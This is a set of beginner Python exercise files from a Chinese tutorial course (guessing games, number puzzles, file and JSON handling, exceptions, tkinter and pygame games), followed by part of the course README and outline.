Date: 2018-03-02 """ import random answer = random.randint(1, 100) counter = 0 while True: counter += 1 number = int(input('请输入: ')) if number < answer: print('大一点') elif number > answer: print('小一点') else: print('恭喜你猜对了!') break print('你总共猜了%d次' % counter) if counter > 7: print('你的智商余额明显不足') File: Day01-15/code/Day05/lily.py """ 找出100~999之间的所有水仙花数 水仙花数是各位立方和等于这个数本身的数 如: 153 = 1**3 + 5**3 + 3**3 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ for num in range(100, 1000): low = num % 10 mid = num // 10 % 10 high = num // 100 if num == low ** 3 + mid ** 3 + high ** 3: print(num) File: Day01-15/code/Day05/perfect.py """ 找出1~9999之间的所有完美数 完美数是除自身外其他所有因子的和正好等于这个数本身的数 例如: 6 = 1 + 2 + 3, 28 = 1 + 2 + 4 + 7 + 14 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ import math for num in range(2, 10000): result = 0 for factor in range(1, int(math.sqrt(num)) + 1): if num % factor == 0: result += factor if factor > 1 and num // factor != factor: result += num // factor if result == num: print(num) File: Day01-15/code/Day05/table.py """ 输出乘法口诀表(九九表) Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ for i in range(1, 10): for j in range(1, i + 1): print('%d*%d=%d' % (i, j, i * j), end='\t') print() File: Day01-15/code/Day05/craps.py """ Craps赌博游戏 玩家摇两颗色子 如果第一次摇出7点或11点 玩家胜 如果摇出2点 3点 12点 庄家胜 其他情况游戏继续 玩家再次要色子 如果摇出7点 庄家胜 如果摇出第一次摇的点数 玩家胜 否则游戏继续 玩家继续摇色子 玩家进入游戏时有1000元的赌注 全部输光游戏结束 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ from random import randint money = 1000 while money > 0: print('你的总资产为:', money) needs_go_on = False while True: debt = int(input('请下注: ')) if 0 < debt <= money: break first = randint(1, 6) + randint(1, 6) print('玩家摇出了%d点' % first) if first == 7 or first == 11: print('玩家胜!') money += debt elif first == 2 or first == 3 or first == 12: print('庄家胜!') money -= debt else: needs_go_on = True while needs_go_on: current = randint(1, 6) + randint(1, 6) print('玩家摇出了%d点' % current) if current == 7: print('庄家胜') money -= debt needs_go_on = False elif current == first: print('玩家胜') money += debt needs_go_on = False print('你破产了, 游戏结束!') File: Day01-15/code/Day05/chicken.py """ 求解《百钱百鸡》问题 1只公鸡5元 1只母鸡3元 3只小鸡1元 用100元买100只鸡 问公鸡 母鸡 小鸡各有多少只 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ for x in range(0, 20): for y 
in range(0, 33): z = 100 - x - y if 5 * x + 3 * y + z / 3 == 100: print('公鸡: %d只, 母鸡: %d只, 小鸡: %d只' % (x, y, z)) File: Day01-15/code/Day05/fibonacci.py """ 输出斐波那契数列的前20个数 1 1 2 3 5 8 13 21 ... Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ a = 0 b = 1 for _ in range(20): a, b = b, a + b print(a, end=' ') File: Day01-15/code/Day11/csv1.py """ 读取CSV文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import csv filename = 'example.csv' try: with open(filename) as f: reader = csv.reader(f) data = list(reader) except FileNotFoundError: print('无法打开文件:', filename) else: for item in data: print('%-30s%-20s%-10s' % (item[0], item[1], item[2])) File: Day01-15/code/Day11/json2.py """ 写入JSON文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import json teacher_dict = {'name': '白元芳', 'age': 25, 'title': '讲师'} json_str = json.dumps(teacher_dict) print(json_str) print(type(json_str)) fruits_list = ['apple', 'orange', 'strawberry', 'banana', 'pitaya'] json_str = json.dumps(fruits_list) print(json_str) print(type(json_str)) File: Day01-15/code/Day11/file2.py """ 读取圆周率文件判断其中是否包含自己的生日 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ birth = input('请输入你的生日: ') with open('pi_million_digits.txt') as f: lines = f.readlines() pi_string = '' for line in lines: pi_string += line.strip() if birth in pi_string: print('Bingo!!!') File: Day01-15/code/Day11/ex2.py """ 异常机制 - 处理程序在运行时可能发生的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ input_again = True while input_again: try: a = int(input('a = ')) b = int(input('b = ')) print('%d / %d = %f' % (a, b, a / b)) input_again = False except (ValueError, ZeroDivisionError) as msg: print(msg) File: Day01-15/code/Day11/ex3.py """ 异常机制 - 处理程序在运行时可能发生的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import time import sys filename = input('请输入文件名: ') try: with open(filename) as f: lines = f.readlines() except FileNotFoundError as msg: print('无法打开文件:', filename) print(msg) except UnicodeDecodeError as msg: print('非文本文件无法解码') sys.exit() else: for line in lines: print(line.rstrip()) time.sleep(0.5) finally: # 此处最适合做善后工作 print('不管发生什么我都会执行') File: Day01-15/code/Day11/file3.py """ 写文本文件 将100以内的素数写入到文件中 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ from math import sqrt def is_prime(n): for factor in range(2, int(sqrt(n)) + 1): if n % factor == 0: return False return True # 试一试有什么不一样 # with open('prime.txt', 'a') as f: with open('prime.txt', 'w') as f: for num in range(2, 100): if is_prime(num): f.write(str(num) + '\n') print('写入完成!') File: Day01-15/code/Day11/file4.py """ 读写二进制文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import base64 with open('mm.jpg', 'rb') as f: data = f.read() # print(type(data)) # print(data) print('字节数:', len(data)) # 将图片处理成BASE-64编码 print(base64.b64encode(data)) with open('girl.jpg', 'wb') as f: f.write(data) print('写入完成!') File: Day01-15/code/Day11/ex4.py """ 引发异常和异常栈 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ def f1(): raise AssertionError('发生异常') def f2(): f1() def f3(): f2() f3() File: Day01-15/code/Day11/file1.py """ 从文本文件中读取数据 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import time def main(): # 一次性读取整个文件内容 with open('致橡树.txt', 'r', encoding='utf-8') as f: print(f.read()) # 通过for-in循环逐行读取 with open('致橡树.txt', mode='r') as f: for line in f: print(line, end='') time.sleep(0.5) print() # 读取文件按行读取到列表中 with open('致橡树.txt') as f: lines = f.readlines() print(lines) if __name__ == '__main__': main() File: Day01-15/code/Day11/ex1.py """ 异常机制 - 处理程序在运行时可能发生的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ input_again = True while input_again: try: a = int(input('a = ')) b = 
int(input('b = ')) print('%d / %d = %f' % (a, b, a / b)) input_again = False except ValueError: print('请输入整数') except ZeroDivisionError: print('除数不能为0') # 处理异常让代码不因异常而崩溃是一方面 # 更重要的是可以通过对异常的处理让代码从异常中恢复过来 File: Day01-15/code/Day11/json1.py """ 读取JSON数据 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import json import csv2 json_str = '{"name": "骆昊", "age": 38, "title": "叫兽"}' result = json.loads(json_str) print(result) print(type(result)) print(result['name']) print(result['age']) # 把转换得到的字典作为关键字参数传入Teacher的构造器 teacher = csv2.Teacher(**result) print(teacher) print(teacher.name) print(teacher.age) print(teacher.title) # 请思考如何将下面JSON格式的天气数据转换成对象并获取我们需要的信息 # 稍后我们会讲解如何通过网络API获取我们需要的JSON格式的数据 """ { "wendu": "29", "ganmao": "各项气象条件适宜,发生感冒机率较低。但请避免长期处于空调房间中,以防感冒。", "forecast": [ { "fengxiang": "南风", "fengli": "3-4级", "high": "高温 32℃", "type": "多云", "low": "低温 17℃", "date": "16日星期二" }, { "fengxiang": "南风", "fengli": "微风级", "high": "高温 34℃", "type": "晴", "low": "低温 19℃", "date": "17日星期三" }, { "fengxiang": "南风", "fengli": "微风级", "high": "高温 35℃", "type": "晴", "low": "低温 22℃", "date": "18日星期四" }, { "fengxiang": "南风", "fengli": "微风级", "high": "高温 35℃", "type": "多云", "low": "低温 22℃", "date": "19日星期五" }, { "fengxiang": "南风", "fengli": "3-4级", "high": "高温 34℃", "type": "晴", "low": "低温 21℃", "date": "20日星期六" } ], "yesterday": { "fl": "微风", "fx": "南风", "high": "高温 28℃", "type": "晴", "low": "低温 15℃", "date": "15日星期一" }, "aqi": "72", "city": "北京" } """ File: Day01-15/code/Day11/csv2.py """ 写入CSV文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import csv class Teacher(object): def __init__(self, name, age, title): self.__name = name self.__age = age self.__title = title self.__index = -1 @property def name(self): return self.__name @property def age(self): return self.__age @property def title(self): return self.__title filename = 'teacher.csv' teachers = [Teacher('骆昊', 38, '叫兽'), Teacher('狄仁杰', 25, '砖家')] try: with open(filename, 'w') as f: writer = csv.writer(f) for teacher in teachers: writer.writerow([teacher.name, teacher.age, teacher.title]) except BaseException as e: print('无法写入文件:', filename) else: print('保存数据完成!') File: Day01-15/code/Day10/renju.py import pygame EMPTY = 0 BLACK = 1 WHITE = 2 black_color = [0, 0, 0] white_color = [255, 255, 255] class RenjuBoard(object): def __init__(self): self._board = [[]] * 15 self.reset() def reset(self): for row in range(len(self._board)): self._board[row] = [EMPTY] * 15 def move(self, row, col, is_black): if self._board[row][col] == EMPTY: self._board[row][col] = BLACK if is_black else WHITE return True return False def draw(self, screen): for index in range(1, 16): pygame.draw.line(screen, black_color, [40, 40 * index], [600, 40 * index], 1) pygame.draw.line(screen, black_color, [40 * index, 40], [40 * index, 600], 1) pygame.draw.rect(screen, black_color, [36, 36, 568, 568], 4) pygame.draw.circle(screen, black_color, [320, 320], 5, 0) pygame.draw.circle(screen, black_color, [160, 160], 5, 0) pygame.draw.circle(screen, black_color, [480, 480], 5, 0) pygame.draw.circle(screen, black_color, [480, 160], 5, 0) pygame.draw.circle(screen, black_color, [160, 480], 5, 0) for row in range(len(self._board)): for col in range(len(self._board[row])): if self._board[row][col] != EMPTY: ccolor = black_color \ if self._board[row][col] == BLACK else white_color pos = [40 * (col + 1), 40 * (row + 1)] pygame.draw.circle(screen, ccolor, pos, 20, 0) def main(): board = RenjuBoard() is_black = True pygame.init() pygame.display.set_caption('五子棋') screen = pygame.display.set_mode([640, 
640]) screen.fill([255, 255, 0]) board.draw(screen) pygame.display.flip() running = True while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False elif event.type == pygame.KEYUP: pass elif event.type == pygame.MOUSEBUTTONDOWN\ and event.button == 1: x, y = event.pos row = round((y - 40) / 40) col = round((x - 40) / 40) if board.move(row, col, is_black): is_black = not is_black screen.fill([255, 255, 0]) board.draw(screen) pygame.display.flip() pygame.quit() if __name__ == '__main__': main() File: Day01-15/code/Day10/gui2.py """ 使用tkinter创建GUI - 使用画布绘图 - 处理鼠标事件 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import tkinter def mouse_evt_handler(evt=None): row = round((evt.y - 20) / 40) col = round((evt.x - 20) / 40) pos_x = 40 * col pos_y = 40 * row canvas.create_oval(pos_x, pos_y, 40 + pos_x, 40 + pos_y, fill='black') top = tkinter.Tk() # 设置窗口尺寸 top.geometry('620x620') # 设置窗口标题 top.title('五子棋') # 设置窗口大小不可改变 top.resizable(False, False) # 设置窗口置顶 top.wm_attributes('-topmost', 1) canvas = tkinter.Canvas(top, width=600, height=600, bd=0, highlightthickness=0) canvas.bind('<Button-1>', mouse_evt_handler) canvas.create_rectangle(0, 0, 600, 600, fill='yellow', outline='white') for index in range(15): canvas.create_line(20, 20 + 40 * index, 580, 20 + 40 * index, fill='black') canvas.create_line(20 + 40 * index, 20, 20 + 40 * index, 580, fill='black') canvas.create_rectangle(15, 15, 585, 585, outline='black', width=4) canvas.pack() tkinter.mainloop() # 请思考如何用面向对象的编程思想对上面的代码进行封装 File: Day01-15/code/Day10/snake.py from abc import ABCMeta, abstractmethod from enum import Enum, unique from random import randrange from threading import Thread import pygame class Color(object): """颜色""" GRAY = (242, 242, 242) BLACK = (0, 0, 0) GREEN = (0, 255, 0) PINK = (255, 20, 147) @unique class Direction(Enum): """方向""" UP = 0 RIGHT = 1 DOWN = 2 LEFT = 3 class GameObject(object, metaclass=ABCMeta): """游戏中的对象""" def __init__(self, x=0, y=0, color=Color.BLACK): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param color: 颜色 """ self._x = x self._y = y self._color = color @property def x(self): return self._x @property def y(self): return self._y @abstractmethod def draw(self, screen): """ 绘制 :param screen: 屏幕 """ pass class Wall(GameObject): """围墙""" def __init__(self, x, y, width, height, color=Color.BLACK): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param width: 宽度 :param height: 高度 :param color: 颜色 """ super().__init__(x, y, color) self._width = width self._height = height @property def width(self): return self._width @property def height(self): return self._height def draw(self, screen): pygame.draw.rect(screen, self._color, (self._x, self._y, self._width, self._height), 4) class Food(GameObject): """食物""" def __init__(self, x, y, size, color=Color.PINK): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param size: 大小 :param color: 颜色 """ super().__init__(x, y, color) self._size = size self._hidden = False def draw(self, screen): if not self._hidden: pygame.draw.circle(screen, self._color, (self._x + self._size // 2, self._y + self._size // 2), self._size // 2, 0) self._hidden = not self._hidden class SnakeNode(GameObject): """蛇身上的节点""" def __init__(self, x, y, size, color=Color.GREEN): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param size: 大小 :param color: 颜色 """ super().__init__(x, y, color) self._size = size @property def size(self): return self._size def draw(self, screen): pygame.draw.rect(screen, self._color, (self._x, self._y, self._size, self._size), 0) pygame.draw.rect(screen, Color.BLACK, (self._x, 
self._y, self._size, self._size), 1) class Snake(GameObject): """蛇""" def __init__(self, x, y, size=20, length=5): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param size: 大小 :param length: 初始长度 """ super().__init__() self._dir = Direction.LEFT self._nodes = [] self._alive = True self._new_dir = None for index in range(length): node = SnakeNode(x + index * size, y, size) self._nodes.append(node) @property def dir(self): return self._dir @property def alive(self): return self._alive @property def head(self): return self._nodes[0] def change_dir(self, new_dir): """ 改变方向 :param new_dir: 新方向 """ if new_dir != self._dir and \ (self._dir.value + new_dir.value) % 2 != 0: self._new_dir = new_dir def move(self): """移动""" if self._new_dir: self._dir, self._new_dir = self._new_dir, None snake_dir = self._dir x, y, size = self.head.x, self.head.y, self.head.size if snake_dir == Direction.UP: y -= size elif snake_dir == Direction.RIGHT: x += size elif snake_dir == Direction.DOWN: y += size else: x -= size new_head = SnakeNode(x, y, size) self._nodes.insert(0, new_head) self._nodes.pop() def collide(self, wall): """ 撞墙 :param wall: 围墙 """ head = self.head if head.x < wall.x or head.x + head.size > wall.x + wall.width \ or head.y < wall.y or head.y + head.size > wall.y + wall.height: self._alive = False def eat_food(self, food): """ 吃食物 :param food: 食物 :return: 吃到食物返回True否则返回False """ if self.head.x == food.x and self.head.y == food.y: tail = self._nodes[-1] self._nodes.append(tail) return True return False def eat_self(self): """咬自己""" for index in range(4, len(self._nodes)): node = self._nodes[index] if node.x == self.head.x and node.y == self.head.y: self._alive = False def draw(self, screen): for node in self._nodes: node.draw(screen) def main(): def refresh(): """刷新游戏窗口""" screen.fill(Color.GRAY) wall.draw(screen) food.draw(screen) snake.draw(screen) pygame.display.flip() def handle_key_event(key_event): """处理按键事件""" key = key_event.key if key == pygame.K_F2: reset_game() elif key in (pygame.K_a, pygame.K_w, pygame.K_d, pygame.K_s): if snake.alive: if key == pygame.K_w: new_dir = Direction.UP elif key == pygame.K_d: new_dir = Direction.RIGHT elif key == pygame.K_s: new_dir = Direction.DOWN else: new_dir = Direction.LEFT snake.change_dir(new_dir) def create_food(): """创建食物""" unit_size = snake.head.size max_row = wall.height // unit_size max_col = wall.width // unit_size row = randrange(0, max_row) col = randrange(0, max_col) return Food(wall.x + unit_size * col, wall.y + unit_size * row, unit_size) def reset_game(): """重置游戏""" nonlocal food, snake food = create_food() snake = Snake(250, 290) def background_task(): nonlocal running, food while running: if snake.alive: refresh() clock.tick(10) if snake.alive: snake.move() snake.collide(wall) if snake.eat_food(food): food = create_food() snake.eat_self() """ class BackgroundTask(Thread): def run(self): nonlocal running, food while running: if snake.alive: refresh() clock.tick(10) if snake.alive: snake.move() snake.collide(wall) if snake.eat_food(food): food = create_food() snake.eat_self() """ wall = Wall(10, 10, 600, 600) snake = Snake(250, 290) food = create_food() pygame.init() screen = pygame.display.set_mode((620, 620)) pygame.display.set_caption('贪吃蛇') # 创建控制游戏每秒帧数的时钟 clock = pygame.time.Clock() running = True # 启动后台线程负责刷新窗口和让蛇移动 # BackgroundTask().start() Thread(target=background_task).start() # 处理事件的消息循环 while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False elif event.type == pygame.KEYDOWN: 
handle_key_event(event) pygame.quit() if __name__ == '__main__': main() File: Day01-15/code/Day10/gui3.py """ 使用tkinter创建GUI - 在窗口上制作动画 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import tkinter import time # 播放动画效果的函数 def play_animation(): canvas.move(oval, 2, 2) canvas.update() top.after(50, play_animation) x = 10 y = 10 top = tkinter.Tk() top.geometry('600x600') top.title('动画效果') top.resizable(False, False) top.wm_attributes('-topmost', 1) canvas = tkinter.Canvas(top, width=600, height=600, bd=0, highlightthickness=0) canvas.create_rectangle(0, 0, 600, 600, fill='gray') oval = canvas.create_oval(10, 10, 60, 60, fill='red') canvas.pack() top.update() play_animation() tkinter.mainloop() # 请思考如何让小球碰到屏幕的边界就弹回 # 请思考如何用面向对象的编程思想对上面的代码进行封装 File: Day01-15/code/Day10/ball.py from enum import Enum, unique from math import sqrt from random import randint import pygame @unique class Color(Enum): """颜色""" RED = (255, 0, 0) GREEN = (0, 255, 0) BLUE = (0, 0, 255) BLACK = (0, 0, 0) WHITE = (255, 255, 255) GRAY = (242, 242, 242) @staticmethod def random_color(): """获得随机颜色""" r = randint(0, 255) g = randint(0, 255) b = randint(0, 255) return (r, g, b) class Ball(object): """球""" def __init__(self, x, y, radius, sx, sy, color=Color.RED): """初始化方法""" self.x = x self.y = y self.radius = radius self.sx = sx self.sy = sy self.color = color self.alive = True def move(self, screen): """移动""" self.x += self.sx self.y += self.sy if self.x - self.radius <= 0 or self.x + self.radius >= screen.get_width(): self.sx = -self.sx if self.y - self.radius <= 0 or self.y + self.radius >= screen.get_height(): self.sy = -self.sy def eat(self, other): """吃其他球""" if self.alive and other.alive and self != other: dx, dy = self.x - other.x, self.y - other.y distance = sqrt(dx ** 2 + dy ** 2) if distance < self.radius + other.radius \ and self.radius > other.radius: other.alive = False self.radius = self.radius + int(other.radius * 0.146) def draw(self, screen): """在窗口上绘制球""" pygame.draw.circle(screen, self.color, (self.x, self.y), self.radius, 0) def main(): # 定义用来装所有球的容器 balls = [] # 初始化导入的pygame中的模块 pygame.init() # 初始化用于显示的窗口并设置窗口尺寸 screen = pygame.display.set_mode((800, 600)) print(screen.get_width()) print(screen.get_height()) # 设置当前窗口的标题 pygame.display.set_caption('大球吃小球') # 定义变量来表示小球在屏幕上的位置 x, y = 50, 50 running = True # 开启一个事件循环处理发生的事件 while running: # 从消息队列中获取事件并对事件进行处理 for event in pygame.event.get(): if event.type == pygame.QUIT: running = False if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1: x, y = event.pos radius = randint(10, 100) sx, sy = randint(-10, 10), randint(-10, 10) color = Color.random_color() ball = Ball(x, y, radius, sx, sy, color) balls.append(ball) screen.fill((255, 255, 255)) for ball in balls: if ball.alive: ball.draw(screen) else: balls.remove(ball) pygame.display.flip() # 每隔50毫秒就改变小球的位置再刷新窗口 pygame.time.delay(50) for ball in balls: ball.move(screen) for other in balls: ball.eat(other) if __name__ == '__main__': main() File: Day01-15/code/Day10/gui1.py """ 使用tkinter创建GUI - 顶层窗口 - 控件 - 布局 - 事件回调 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import tkinter import tkinter.messagebox def main(): flag = True # 修改标签上的文字 def change_label_text(): nonlocal flag flag = not flag color, msg = ('red', 'Hello, world!')\ if flag else ('blue', 'Goodbye, world!') label.config(text=msg, fg=color) # 确认退出 def confirm_to_quit(): if tkinter.messagebox.askokcancel('温馨提示', '确定要退出吗?'): top.quit() # 创建顶层窗口 top = tkinter.Tk() # 设置窗口大小 top.geometry('240x160') # 设置窗口标题 top.title('小游戏') # 创建标签对象 label = 
tkinter.Label(top, text='Hello, world!', font='Arial -32', fg='red') label.pack(expand=1) # 创建一个装按钮的容器 panel = tkinter.Frame(top) # 创建按钮对象 button1 = tkinter.Button(panel, text='修改', command=change_label_text) button1.pack(side='left') button2 = tkinter.Button(panel, text='退出', command=confirm_to_quit) button2.pack(side='right') panel.pack(side='bottom') # 开启主事件循环 tkinter.mainloop() if __name__ == '__main__': main() File: Day01-15/code/Day10/turtle1.py """ 用turtle模块绘图 这是一个非常有趣的模块 它模拟一只乌龟在窗口上爬行的方式来进行绘图 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import turtle turtle.pensize(3) turtle.penup() turtle.goto(-180, 150) turtle.pencolor('red') turtle.fillcolor('yellow') turtle.pendown() turtle.begin_fill() for _ in range(36): turtle.forward(200) turtle.right(170) turtle.end_fill() turtle.mainloop()
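# One possible answer to the exercise posed at the end of gui3.py above
# ("think about how to make the ball bounce back when it hits the edge of the
# window"). This is only a minimal sketch, assuming the same 600x600 canvas
# used in gui3.py: it keeps a velocity for each axis and flips its sign
# whenever canvas.coords reports that the oval has reached a border.
import tkinter


def play_animation():
    global dx, dy
    canvas.move(oval, dx, dy)
    x1, y1, x2, y2 = canvas.coords(oval)
    if x1 <= 0 or x2 >= 600:   # hit the left or right edge
        dx = -dx
    if y1 <= 0 or y2 >= 600:   # hit the top or bottom edge
        dy = -dy
    top.after(20, play_animation)


dx, dy = 3, 2
top = tkinter.Tk()
top.geometry('600x600')
top.title('Bouncing ball')
top.resizable(False, False)
canvas = tkinter.Canvas(top, width=600, height=600, bd=0, highlightthickness=0)
canvas.create_rectangle(0, 0, 600, 600, fill='gray')
oval = canvas.create_oval(10, 10, 60, 60, fill='red')
canvas.pack()
play_animation()
tkinter.mainloop()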
## Python - 100天从新手到大师 > **作者**:骆昊 > > **说明**:从项目上线到获得8w+星标以来,一直收到反馈说基础部分(前15天的内容)对新手来说是比较困难的,建议有配套视频进行讲解。最近把基础部分的内容重新制作了一个名为[“Python-Core-50-Courses”](<https://github.com/jackfrued/Python-Core-50-Courses>)的项目,用更为简单通俗的方式重写了这部分内容并附带了视频讲解,初学者可以看看这个新的仓库。国内用户如果访问GitHub比较慢的话,可以关注我的**知乎号[Python-Jack](https://www.zhihu.com/people/jackfrued)**,上面的[“从零开始学Python”](<https://zhuanlan.zhihu.com/c_1216656665569013760>)专栏比较适合初学者,其他的专栏如“数据思维和统计思维”、“基于Python的数据分析”等也在持续创作和更新中,欢迎大家关注、点赞和评论。 > > 想获取学习视频的小伙伴,大家可以扫描下面的二维码进入微信小程序,看看有没有适合自己的内容。大家心心念念的机器学习的内容在小程序中都可以找到,由我和我的同事为大家录制的。 > > <img src="res/study_card.png" style="zoom:20%;"> > > 大家在学习过程中如果遇到一些棘手的问题或者需要相关的学习资源,可以加入下面的QQ交流群,三个群是一样的加入一个即可,请不要重复加群,也不要在群里发布广告和其他色情、低俗或敏感内容。**如果缺乏自律性,有付费学习的需求,可以添加我的微信(jackfrued)私聊,备注好自己的称呼和需求,我会给大家提供一些学习方案和职业规划方面的指导**。 > > <img src="res/python_study_qq_group.png" style="zoom:30%;"> > > 配套的视频在抖音和B站持续更新中,有兴趣的小伙伴可以关注我的抖音或B站账号,最近刚刚起号,还希望大家多多支持,非常感谢您! > > <img src="res/qrcode.JPG" style="zoom:20%;"> > > 大家一直催更的《机器学习和深度学习》因个人和公司的原因,一直处于停滞状态,近期会开始更新相关内容,感谢大家一如既往的支持和理解。 ### Python应用领域和职业发展分析 简单的说,Python是一个“优雅”、“明确”、“简单”的编程语言。 - 学习曲线低,非专业人士也能上手 - 开源系统,拥有强大的生态圈 - 解释型语言,完美的平台可移植性 - 动态类型语言,支持面向对象和函数式编程 - 代码规范程度高,可读性强 Python在以下领域都有用武之地。 - 后端开发 - Python / Java / Go / PHP - DevOps - Python / Shell / Ruby - 数据采集 - Python / C++ / Java - 量化交易 - Python / C++ / R - 数据科学 - Python / R / Julia / Matlab - 机器学习 - Python / R / C++ / Julia - 自动化测试 - Python / Shell 作为一名Python开发者,根据个人的喜好和职业规划,可以选择的就业领域也非常多。 - Python后端开发工程师(服务器、云平台、数据接口) - Python运维工程师(自动化运维、SRE、DevOps) - Python数据分析师(数据分析、商业智能、数字化运营) - Python数据挖掘工程师(机器学习、深度学习、算法专家) - Python爬虫工程师 - Python测试工程师(自动化测试、测试开发) > **说明**:目前,**数据分析和数据挖掘是非常热门的方向**,因为不管是互联网行业还是传统行业都已经积累了大量的数据,各行各业都需要数据分析师从已有的数据中发现更多的商业价值,从而为企业的决策提供数据的支撑,这就是所谓的数据驱动决策。 给初学者的几个建议: - Make English as your working language. (让英语成为你的工作语言) - Practice makes perfect. (熟能生巧) - All experience comes from mistakes. (所有的经验都源于你犯过的错误) - Don't be one of the leeches. (不要当伸手党) - Either outstanding or out. 
(要么出众,要么出局) ### Day01~15 - Python语言基础 #### Day01 - [初识Python](./Day01-15/01.初识Python.md) - Python简介 - Python的历史 / Python的优缺点 / Python的应用领域 - 搭建编程环境 - Windows环境 / Linux环境 / MacOS环境 - 从终端运行Python程序 - Hello, world / `print`函数 / 运行程序 - 使用IDLE - 交互式环境(REPL) / 编写多行代码 / 运行程序 / 退出IDLE - 注释 - 注释的作用 / 单行注释 / 多行注释 #### Day02 - [语言元素](./Day01-15/02.语言元素.md) - 程序和进制 - 指令和程序 / 冯诺依曼机 / 二进制和十进制 / 八进制和十六进制 - 变量和类型 - 变量的命名 / 变量的使用 / `input`函数 / 检查变量类型 / 类型转换 - 数字和字符串 - 整数 / 浮点数 / 复数 / 字符串 / 字符串基本操作 / 字符编码 - 运算符 - 数学运算符 / 赋值运算符 / 比较运算符 / 逻辑运算符 / 身份运算符 / 运算符的优先级 - 应用案例 - 华氏温度转换成摄氏温度 / 输入圆的半径计算周长和面积 / 输入年份判断是否是闰年 #### Day03 - [分支结构](./Day01-15/03.分支结构.md) - 分支结构的应用场景 - 条件 / 缩进 / 代码块 / 流程图 - if语句 - 简单的`if` / `if`-`else`结构 / `if`-`elif`-`else`结构 / 嵌套的`if` - 应用案例 - 用户身份验证 / 英制单位与公制单位互换 / 掷骰子决定做什么 / 百分制成绩转等级制 / 分段函数求值 / 输入三条边的长度如果能构成三角形就计算周长和面积 #### Day04 - [循环结构](./Day01-15/04.循环结构.md) - 循环结构的应用场景 - 条件 / 缩进 / 代码块 / 流程图 - while循环 - 基本结构 / `break`语句 / `continue`语句 - for循环 - 基本结构 / `range`类型 / 循环中的分支结构 / 嵌套的循环 / 提前结束程序 - 应用案例 - 1~100求和 / 判断素数 / 猜数字游戏 / 打印九九表 / 打印三角形图案 / 猴子吃桃 / 百钱百鸡 #### Day05 - [构造程序逻辑](./Day01-15/05.构造程序逻辑.md) - 经典案例:水仙花数 / 百钱百鸡 / Craps赌博游戏 - 练习题目:斐波那契数列 / 完美数 / 素数 #### Day06 - [函数和模块的使用](./Day01-15/06.函数和模块的使用.md) - 函数的作用 - 代码的坏味道 / 用函数封装功能模块 - 定义函数 - `def`关键字 / 函数名 / 参数列表 / `return`语句 / 调用自定义函数 - 调用函数 - Python内置函数 / 导入模块和函数 - 函数的参数 - 默认参数 / 可变参数 / 关键字参数 / 命名关键字参数 - 函数的返回值 - 没有返回值 / 返回单个值 / 返回多个值 - 作用域问题 - 局部作用域 / 嵌套作用域 / 全局作用域 / 内置作用域 / 和作用域相关的关键字 - 用模块管理函数 - 模块的概念 / 用自定义模块管理函数 / 命名冲突的时候会怎样(同一个模块和不同的模块) #### Day07 - [字符串和常用数据结构](./Day01-15/07.字符串和常用数据结构.md) - 字符串的使用 - 计算长度 / 下标运算 / 切片 / 常用方法 - 列表基本用法 - 定义列表 / 用下表访问元素 / 下标越界 / 添加元素 / 删除元素 / 修改元素 / 切片 / 循环遍历 - 列表常用操作 - 连接 / 复制(复制元素和复制数组) / 长度 / 排序 / 倒转 / 查找 - 生成列表 - 使用`range`创建数字列表 / 生成表达式 / 生成器 - 元组的使用 - 定义元组 / 使用元组中的值 / 修改元组变量 / 元组和列表转换 - 集合基本用法 - 集合和列表的区别 / 创建集合 / 添加元素 / 删除元素 / 清空 - 集合常用操作 - 交集 / 并集 / 差集 / 对称差 / 子集 / 超集 - 字典的基本用法 - 字典的特点 / 创建字典 / 添加元素 / 删除元素 / 取值 / 清空 - 字典常用操作 - `keys`方法 / `values`方法 / `items`方法 / `setdefault`方法 - 基础练习 - 跑马灯效果 / 列表找最大元素 / 统计考试成绩的平均分 / Fibonacci数列 / 杨辉三角 - 综合案例 - 双色球选号 / 井字棋 #### Day08 - [面向对象编程基础](./Day01-15/08.面向对象编程基础.md) - 类和对象 - 什么是类 / 什么是对象 / 面向对象其他相关概念 - 定义类 - 基本结构 / 属性和方法 / 构造器 / 析构器 / `__str__`方法 - 使用对象 - 创建对象 / 给对象发消息 - 面向对象的四大支柱 - 抽象 / 封装 / 继承 / 多态 - 基础练习 - 定义学生类 / 定义时钟类 / 定义图形类 / 定义汽车类 #### Day09 - [面向对象进阶](./Day01-15/09.面向对象进阶.md) - 属性 - 类属性 / 实例属性 / 属性访问器 / 属性修改器 / 属性删除器 / 使用`__slots__` - 类中的方法 - 实例方法 / 类方法 / 静态方法 - 运算符重载 - `__add__` / `__sub__` / `__or__` /`__getitem__` / `__setitem__` / `__len__` / `__repr__` / `__gt__` / `__lt__` / `__le__` / `__ge__` / `__eq__` / `__ne__` / `__contains__` - 类(的对象)之间的关系 - 关联 / 继承 / 依赖 - 继承和多态 - 什么是继承 / 继承的语法 / 调用父类方法 / 方法重写 / 类型判定 / 多重继承 / 菱形继承(钻石继承)和C3算法 - 综合案例 - 工资结算系统 / 图书自动折扣系统 / 